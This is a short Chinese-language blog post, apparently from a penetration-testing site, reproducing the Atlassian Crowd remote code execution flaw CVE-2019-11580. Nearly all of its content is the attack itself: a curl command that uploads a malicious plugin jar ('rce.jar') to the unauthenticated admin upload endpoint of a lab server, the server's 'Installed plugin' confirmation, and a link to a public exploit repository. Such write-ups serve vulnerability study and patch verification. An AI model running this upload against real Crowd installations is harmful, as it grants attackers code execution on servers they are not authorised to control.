首页 » NetworkSec » Penetration » 正文

Atlassian Crowd and Crowd Data Center RCE 漏洞重现(CVE-2019-11580)

201907,网上爆出Atlassian Crowd and Crowd Data Center RCE 漏洞,重现一下。

 

 

curl -k -H “Content-Type: multipart/mixed” \
–form “file_cdl=@rce.jar” http://10.10.20.166:8095/crowd/admin/uploadplugin.action

Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar

https://github.com/jas502n/CVE-2019-11580

 

Comment

please input captcha *